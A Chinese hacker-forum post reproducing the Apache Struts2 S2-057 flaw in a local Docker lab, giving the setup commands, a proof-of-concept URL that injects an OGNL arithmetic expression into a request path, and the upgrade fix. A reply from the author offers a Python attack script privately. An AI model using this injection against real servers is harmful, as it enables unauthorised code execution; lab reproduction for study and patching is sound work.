St2-057复现

冷逸
4541冷逸网络安全主管
2018-09-04 23:23:48
4541 2018-09-04 23:23:48


获取环境:

拉取镜像到本地
$ docker pull medicean/vulapps:s_struts2_s2-057


启动环境

$ docker run -d -p 80:8080 medicean/vulapps:s_struts2_s2-057
-p 80:8080 前面的 80 代表物理机的端口,可随意指定。


PoC

例如目标地址为:http://127.0.0.1:8080/
访问 http://127.0.0.1:8080/${(111+111)}/actionChain1.action
然后 URL 会变为 : http://127.0.0.1:8080/222/register2.action, 其中 222 部分为 ognl 表达式 ${(111+111)} 执行结果。


修复建议

升级Apache struts 至 2.5.17 版本 或者 2.3.35 版本


复现视频

https://www.bilibili.com/video/av30175360/
本文标题:St2-057复现
本文作者:冷逸
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2260.html
冷逸
沙发冷逸网络安全主管 2018-09-04 23:24
py脚本版可以私信我
游客
登录后才可以回帖,登录 或者 注册
weixin
蚁安蚂蚁堆

找工具、找教程、找朋友,你想不到的这儿都有!

微信号:baiyiwangan